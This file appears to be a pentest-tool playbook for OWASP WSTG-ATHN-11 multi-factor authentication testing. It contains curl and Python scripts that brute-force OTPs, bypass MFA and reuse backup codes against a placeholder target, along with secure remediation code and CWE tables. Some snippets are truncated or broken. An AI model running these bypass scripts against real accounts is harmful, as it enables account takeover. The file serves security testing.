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| name | wstg-athn-11 |
| description | Testing Multi-Factor Authentication (MFA) |
| category | authentication |
| owasp_id | WSTG-ATHN-11 |
| version | 1.0.0 |
| author | cyberstrike-official |
| tags | ["authentication","login","credentials","mfa","wstg","athn"] |
| tech_stack | [] |
| cwe_ids | [] |
| chains_with | [] |
| prerequisites | [] |
| severity_boost | {} |
WSTG-ATHN-11
Testing Multi-Factor Authentication (MFA)
Multi-Factor Authentication adds an additional layer of security beyond passwords. This test examines the implementation of MFA for weaknesses such as bypass vulnerabilities, weak OTP generation, lack of rate limiting, and improper enrollment procedures. A flawed MFA implementation can give users false confidence while not actually providing meaningful protection.
| Weakness | Description |
|---|---|
| Direct page access | Bypass MFA by accessing post-auth pages |
| Response manipulation | Change response to indicate MFA success |
| Brute force OTP | No rate limiting on attempts |
| Weak OTP generation | Predictable codes |
| Backup code reuse | Codes not single-use |
# After completing first factor, try to access protected pages directly
# without completing MFA
# Get session after password auth
session=$(curl -s -X POST "https://target.com/api/login" \
-H "Content-Type: application/json" \
-d '{"username":"test","password":"password"}' \
-c - | grep session | awk '{print $7}')
# Try to access protected resources without MFA completion
protected_pages=(
)
page ;
response=$(curl -s \
-H \
-w )
#!/bin/bash
# Test rate limiting on OTP attempts
MFA_TOKEN="temporary_mfa_token"
for otp in {000000..000100}; do
response=$(curl -s -X POST "https://target.com/api/verify-mfa" \
-H "Content-Type: application/json" \
-d "{\"token\":\"$MFA_TOKEN\",\"otp\":\"$otp\"}" \
-w "\n%{http_code}")
status=$(echo "$response" | tail -1)
if [ "$status" == "429" ]; then
echo "Rate limited after trying OTP: $otp"
break
fi
if echo "$response" | grep -qi "success"; then
echo "[SUCCESS] Valid OTP: $otp"
break
fi
done
#!/bin/bash
# Collect multiple OTPs to analyze patterns
echo "Request OTPs at different times to analyze patterns:"
for i in {1..10}; do
# Request SMS/Email OTP
response=$(curl -s -X POST "https://target.com/api/send-otp" \
-H "Authorization: Bearer $MFA_TOKEN" \
-H "Content-Type: application/json" \
-d '{"method":"email"}')
echo "Request $i at $(date +%s): $response"
sleep 5
done
# Check received OTPs for patterns:
# - Sequential?
# - Timestamp-based?
# - Short length?
# Test if changing response allows MFA bypass
# This is typically done with Burp Suite:
# 1. Submit wrong OTP
# 2. Intercept response
# 3. Change {"success": false} to {"success": true}
# 4. Check if access is granted
# Programmatic test:
# Submit with wrong OTP and check server-side validation
curl -s -X POST "https://target.com/api/verify-mfa" \
-H "Content-Type: application/json" \
-d '{"token":"mfa_token","otp":"000000"}' \
-v 2>&1 | grep -i "set-cookie"
# If new session cookie is set even with wrong OTP, there's an issue
# Test backup code security
# Use a backup code
backup_code="BACKUP-CODE-1"
curl -s -X POST "https://target.com/api/verify-mfa" \
-H "Authorization: Bearer $MFA_TOKEN" \
-H "Content-Type: application/json" \
-d "{\"backup_code\":\"$backup_code\"}"
# Try to use the same code again
response=$(curl -s -X POST "https://target.com/api/verify-mfa" \
-H "Authorization: Bearer $MFA_TOKEN" \
-H "Content-Type: application/json" \
-d "{\"backup_code\":\"$backup_code\"}")
if echo "$response" | grep -qi "success"; then
echo "[VULN] Backup code can be reused!"
else
echo "[OK] Backup code is single-use"
fi
# Test if MFA can be disabled without verification
# Try to disable MFA without OTP
curl -s -X POST "https://target.com/api/disable-mfa" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{}'
# Try to change MFA method without verification
curl -s -X POST "https://target.com/api/update-mfa" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"method":"sms","phone":"+1234567890"}'
# Test if MFA enrollment can be bypassed
curl -s -X POST "https://target.com/api/enable-mfa" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"method":"totp","skip_verification":true}'
# Test if "remember device" can be abused
# Enable remember device
curl -s -X POST "https://target.com/api/verify-mfa" \
-H "Content-Type: application/json" \
-d '{"token":"mfa_token","otp":"123456","remember_device":true}' \
-c cookies.txt
# Check device token
cat cookies.txt | grep -i "device\|remember\|trusted"
# Test if device token works from different IP
curl -s "https://target.com/api/login" \
-H "X-Forwarded-For: 1.2.3.4" \
-b cookies.txt
# Test device token expiration
# Test if token works on different browsers
#!/usr/bin/env python3
# Test TOTP implementation security
import pyotp
import time
# If you have access to the TOTP secret
secret = "TEST_SECRET_KEY"
totp = pyotp.TOTP(secret)
# Test if old codes are accepted (time window too large)
old_code = totp.at(time.time() - 120) # 2 minutes ago
response = requests.post(
"https://target.com/api/verify-mfa",
json={"otp": old_code}
)
print(f"2-minute old code: {response.status_code}")
# Test if future codes are accepted
future_code = totp.at(time.time() + 120) # 2 minutes ahead
response = requests.post(
"https://target.com/api/verify-mfa",
json={"otp": future_code}
)
print(f"2-minute future code: {response.status_code}")
# Codes should only be valid for ~30 seconds window
| Tool | Description | Usage |
|---|---|---|
| Burp Suite | Response manipulation | MFA bypass testing |
| pyotp | TOTP testing | Code generation/analysis |
| Custom scripts | Automated testing | OTP brute force |
| Tool | Description |
|---|---|
| oathtool | TOTP/HOTP generation |
| Python | Custom analysis scripts |
#!/usr/bin/env python3
import requests
import time
import pyotp
class MFATester:
def __init__(self, base_url):
self.base_url = base_url
self.session = requests.Session()
self.results = {}
def test_bypass_direct_access(self, partial_auth_cookie, protected_pages):
"""Test if MFA can be bypassed by direct page access"""
print("[*] Testing direct page access bypass...")
vulnerable = []
for page in protected_pages:
response = self.session.get(
f"{self.base_url}{page}",
cookies={"session": partial_auth_cookie}
)
if response.status_code == 200 and "login" not in response.url.lower():
vulnerable.append(page)
self.results["direct_access_bypass"] = {
"vulnerable_pages": vulnerable,
"vulnerable": len(vulnerable) > 0
}
def test_otp_brute_force(self, mfa_token, max_attempts=100):
"""Test rate limiting on OTP attempts"""
print("[*] Testing OTP brute force protection...")
blocked_at = None
for i in range(max_attempts):
otp = str(i).zfill(6)
response = self.session.post(
f"{self.base_url}/api/verify-mfa",
json={"token": mfa_token, "otp": otp}
)
if response.status_code == 429:
blocked_at = i + 1
break
self.results["otp_brute_force"] = {
"blocked_after": blocked_at,
"no_rate_limit": blocked_at is None or blocked_at > 10
}
def test_backup_code_reuse(self, mfa_token, backup_code):
"""Test if backup codes can be reused"""
print("[*] Testing backup code reuse...")
# First use
response1 = self.session.post(
f"{self.base_url}/api/verify-mfa",
json={"token": mfa_token, "backup_code": backup_code}
)
# Second use
response2 = self.session.post(
f"{self.base_url}/api/verify-mfa",
json={"token": mfa_token, "backup_code": backup_code}
)
self.results["backup_code_reuse"] = {
"first_use": response1.status_code,
"second_use": response2.status_code,
"vulnerable": response2.status_code == 200
}
def test_totp_window(self, secret):
"""Test if TOTP accepts codes outside valid window"""
print("[*] Testing TOTP time window...")
totp = pyotp.TOTP(secret)
now = time.time()
# Test codes from different times
time_offsets = [-300, -180, -120, -60, -30, 0, 30, 60, 120, 180, 300]
accepted = []
for offset in time_offsets:
code = totp.at(now + offset)
response = self.session.post(
f"{self.base_url}/api/verify-mfa",
json={"otp": code}
)
if response.status_code == 200:
accepted.append(offset)
self.results["totp_window"] = {
"accepted_offsets": accepted,
"too_wide": any(abs(o) > 60 for o in accepted)
}
def test_mfa_disable(self, auth_token):
"""Test if MFA can be disabled without verification"""
print("[*] Testing MFA disable security...")
# Try to disable without OTP
response = self.session.post(
f"{self.base_url}/api/disable-mfa",
headers={"Authorization": f"Bearer {auth_token}"},
json={}
)
self.results["mfa_disable"] = {
"requires_verification": response.status_code != 200,
"vulnerable": response.status_code == 200
}
def test_session_after_mfa(self, pre_mfa_session, post_mfa_session):
"""Test if session changes after MFA"""
print("[*] Testing session handling after MFA...")
self.results["session_after_mfa"] = {
"same_session": pre_mfa_session == post_mfa_session,
"vulnerable": pre_mfa_session == post_mfa_session
}
def generate_report(self):
"""Generate MFA security report"""
print("\n" + "=" * 60)
print("MFA SECURITY TEST REPORT")
print("=" * 60 + "\n")
vulnerabilities = []
for test_name, result in self.results.items():
vulnerable = result.get("vulnerable", False) or result.get("no_rate_limit", False)
status = "[VULN]" if vulnerable else "[OK]"
print(f"{status} {test_name}")
for key, value in result.items():
if key not in ["vulnerable"]:
print(f" {key}: {value}")
if vulnerable:
vulnerabilities.append(test_name)
print()
print("=" * 60)
print(f"Total vulnerabilities: {len(vulnerabilities)}")
if vulnerabilities:
print("Issues found:")
for v in vulnerabilities:
print(f" - {v}")
# Usage
tester = MFATester("https://target.com")
tester.test_bypass_direct_access("partial_session", ["/dashboard", "/settings"])
tester.test_otp_brute_force("mfa_token")
tester.generate_report()
import pyotp
import secrets
from datetime import datetime, timedelta
class SecureMFA:
MAX_OTP_ATTEMPTS = 5
OTP_LOCKOUT_DURATION = 900 # 15 minutes
TOTP_VALID_WINDOW = 1 # Only current and previous code
def __init__(self, redis_client):
self.redis = redis_client
def generate_totp_secret(self):
"""Generate secure TOTP secret"""
return pyotp.random_base32()
def verify_totp(self, user_id, code):
"""Verify TOTP with rate limiting and narrow window"""
# Check rate limit
if not self.check_rate_limit(user_id):
return False, "Too many attempts"
user = User.query.get(user_id)
totp = pyotp.TOTP(user.totp_secret)
# Verify with narrow window (only current and previous code)
if totp.verify(code, valid_window=self.TOTP_VALID_WINDOW):
# Check if code was already used (replay protection)
if self.is_code_used(user_id, code):
return False, "Code already used"
self.mark_code_used(user_id, code)
self.clear_attempts(user_id)
return True, None
self.record_failed_attempt(user_id)
return False, "Invalid code"
def check_rate_limit(self, user_id):
"""Check if user is rate limited"""
lockout_key = f"mfa_lockout:{user_id}"
if self.redis.exists(lockout_key):
return False
attempts_key = f"mfa_attempts:{user_id}"
attempts = int(self.redis.get(attempts_key) or 0)
if attempts >= self.MAX_OTP_ATTEMPTS:
self.redis.setex(lockout_key, self.OTP_LOCKOUT_DURATION, "1")
return False
return True
def record_failed_attempt(self, user_id):
"""Record failed MFA attempt"""
key = f"mfa_attempts:{user_id}"
self.redis.incr(key)
self.redis.expire(key, 3600)
def is_code_used(self, user_id, code):
"""Check if code was already used (prevent replay)"""
key = f"mfa_used_codes:{user_id}"
return self.redis.sismember(key, code)
def mark_code_used(self, user_id, code):
"""Mark code as used"""
key = f"mfa_used_codes:{user_id}"
self.redis.sadd(key, code)
self.redis.expire(key, 120) # Codes expire after 2 minutes anyway
def generate_backup_codes(self, user_id, count=10):
"""Generate single-use backup codes"""
codes = []
for _ in range(count):
code = secrets.token_hex(4).upper()
codes.append(code)
# Store hashed codes
for code in codes:
BackupCode.create(
user_id=user_id,
code_hash=hash_code(code),
used=False
)
return codes
def verify_backup_code(self, user_id, code):
"""Verify and consume backup code"""
code_hash = hash_code(code)
backup = BackupCode.query.filter_by(
user_id=user_id,
code_hash=code_hash,
used=False
).first()
if not backup:
return False
# Mark as used
backup.used = True
backup.used_at = datetime.utcnow()
db.session.commit()
return True
@app.route('/api/verify-mfa', methods=['POST'])
def verify_mfa():
mfa_token = request.json.get('mfa_token')
otp = request.json.get('otp')
backup_code = request.json.get('backup_code')
# Validate MFA token
token_data = mfa_service.validate_temp_token(mfa_token)
if not token_data:
return jsonify({"error": "Invalid or expired MFA token"}), 401
user_id = token_data['user_id']
# Verify OTP or backup code
if otp:
success, error = mfa_service.verify_totp(user_id, otp)
elif backup_code:
success = mfa_service.verify_backup_code(user_id, backup_code)
error = None if success else "Invalid backup code"
else:
return jsonify({"error": "OTP or backup code required"}), 400
if not success:
return jsonify({"error": error}), 401
# Create NEW session (not reuse pre-MFA session)
session = create_new_session(user_id, mfa_verified=True)
# Invalidate MFA temp token
mfa_service.invalidate_temp_token(mfa_token)
return jsonify({"session_token": session.token})
def require_mfa_verification(f):
"""Decorator to require recent MFA verification"""
@wraps(f)
def decorated(*args, **kwargs):
if not current_user.mfa_enabled:
return f(*args, **kwargs)
# Check if MFA was recently verified
last_mfa = session.get('last_mfa_verification')
if not last_mfa or (datetime.utcnow() - last_mfa).seconds > 300:
return jsonify({
"error": "MFA verification required",
"require_mfa": True
}), 403
return f(*args, **kwargs)
return decorated
@app.route('/api/disable-mfa', methods=['POST'])
@login_required
@require_mfa_verification # Require fresh MFA before disabling
def disable_mfa():
otp = request.json.get('otp')
if not mfa_service.verify_totp(current_user.id, otp):
return jsonify({"error": "Invalid OTP"}), 401
current_user.mfa_enabled = False
current_user.totp_secret = None
db.session.commit()
# Notify user
send_mfa_disabled_notification(current_user)
return jsonify({"message": "MFA disabled"})
| Finding | CVSS | Severity |
|---|---|---|
| MFA bypass via direct access | 9.8 | Critical |
| No rate limiting on OTP | 8.8 | High |
| Backup code reuse | 7.5 | High |
| Wide TOTP time window | 5.3 | Medium |
| MFA disable without verification | 7.5 | High |
| CWE ID | Title | Description |
|---|---|---|
| CWE-308 | Use of Single-factor Authentication | MFA bypass |
| CWE-307 | Improper Restriction of Excessive Authentication Attempts | OTP brute force |
| CWE-287 | Improper Authentication | MFA implementation flaws |
[ ] MFA bypass via direct access tested
[ ] OTP brute force protection tested
[ ] OTP predictability analyzed
[ ] Response manipulation tested
[ ] Backup code single-use verified
[ ] Backup code security tested
[ ] MFA enrollment security tested
[ ] MFA disable security tested
[ ] Remember device feature tested
[ ] TOTP time window verified
[ ] Session handling after MFA tested
[ ] Findings documented
[ ] Remediation recommendations provided